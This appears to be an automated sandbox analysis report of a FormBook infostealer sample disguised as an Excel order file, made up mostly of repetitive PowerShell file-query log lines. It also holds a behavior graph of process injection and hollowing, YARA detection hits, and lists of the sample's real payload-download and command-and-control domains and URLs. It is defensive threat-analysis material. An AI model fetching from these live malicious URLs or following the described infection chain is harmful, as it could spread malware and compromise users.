Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E39B55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_00E39B55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E392E8 memset,GetVersionExW, 8_2_00E392E8
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649124 Sample: RFQ Order PT502818.xls.vbs Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 41 www.nw01erf.pro 2->41 43 www.menopausemarketing.pro 2->43 45 6 other IPs or domains 2->45 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 14 other signatures 2->75 13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 95 VBScript performs obfuscated calls to suspicious functions 13->95 97 Suspicious powershell command line found 13->97 99 Wscript starts Powershell (via cmd or directly) 13->99 101 2 other signatures 13->101 16 powershell.exe 7 13->16         started        process6 signatures7 55 Suspicious powershell command line found 16->55 57 Suspicious execution chain found 16->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 16->59 19 powershell.exe 14 23 16->19         started        23 conhost.exe 16->23         started        process8 dnsIp9 47 ofice365.github.io 185.199.109.153, 443, 49715 FASTLYUS Netherlands 19->47 49 s3-r-w.us-east-1.amazonaws.com 16.15.192.227, 443, 49721 unknown United States 19->49 77 Writes to foreign memory regions 19->77 79 Injects a PE file into a foreign processes 19->79 81 Loading BitLocker PowerShell Module 19->81 25 RegAsm.exe 19->25         started        28 RegAsm.exe 19->28         started        signatures10 process11 signatures12 83 Modifies the context of a thread in another process (thread injection) 25->83 85 Maps a DLL or memory area into another process 25->85 87 Sample uses process hollowing technique 25->87 93 2 other signatures 25->93 30 explorer.exe 35 1 25->30 injected 89 Tries to detect virtualization through RDTSC time measurements 28->89 91 Switches to a custom stack to bypass stack traces 28->91 process13 dnsIp14 51 www.nw01erf.pro 154.198.239.29, 49725, 80 CNSERVERSUS Seychelles 30->51 53 parkingpage.namecheap.com 91.195.240.19, 49727, 80 SEDO-ASDE Germany 30->53 103 System process connects to network (likely due to code injection or exploit) 30->103 105 Uses netsh to modify the Windows network and firewall settings 30->105 34 netsh.exe 30->34         started        signatures15 process16 signatures17 61 Modifies the context of a thread in another process (thread injection) 34->61 63 Maps a DLL or memory area into another process 34->63 65 Tries to detect virtualization through RDTSC time measurements 34->65 67 Switches to a custom stack to bypass stack traces 34->67 37 cmd.exe 1 34->37         started        process18 process19 39 conhost.exe 37->39         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
154.198.239.29
 www.nw01erf.pro Seychelles
40065 CNSERVERSUS true
16.15.192.227
 s3-r-w.us-east-1.amazonaws.com United States
unknown unknown false
185.199.109.153
 ofice365.github.io Netherlands
54113 FASTLYUS false
91.195.240.19
 parkingpage.namecheap.com Germany
47846 SEDO-ASDE false

Contacted Domains

Name IP Active
www.nw01erf.pro 154.198.239.29 true
parkingpage.namecheap.com 91.195.240.19 true
ofice365.github.io 185.199.109.153 true
s3-r-w.us-east-1.amazonaws.com 16.15.192.227 true
www.etimestrips.store unknown unknown
leka25.s3.us-east-1.amazonaws.com unknown unknown
www.menopausemarketing.pro unknown unknown
www.hopeclothing.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.menopausemarketing.pro/mtpi/?wR=WpZS+bw4JXH0y118vk5hQTOL+1r6bbOHRTASiZs1K9uS3ePifMNiBK1a8R3amt8aiouh&V4=jDKdPfM0e true
  • Avira URL Cloud: safe
 unknown
www.cameronreitsma.net/mtpi/ true
  • Avira URL Cloud: safe
 unknown
https://ofice365.github.io/1/test.jpg false
    		high
    http://www.nw01erf.pro/mtpi/?wR=LDlZA8c8ccZsWXrHXJy43Rqas/rkEJBbKG585dTsIiDnmU9iwQgUnyEkHdWjaY+U5WHy&V4=jDKdPfM0e true
    • Avira URL Cloud: safe
    		 unknown
    https://leka25.s3.us-east-1.amazonaws.com/ebgApAm.txt false
    • Avira URL Cloud: safe
    		 unknown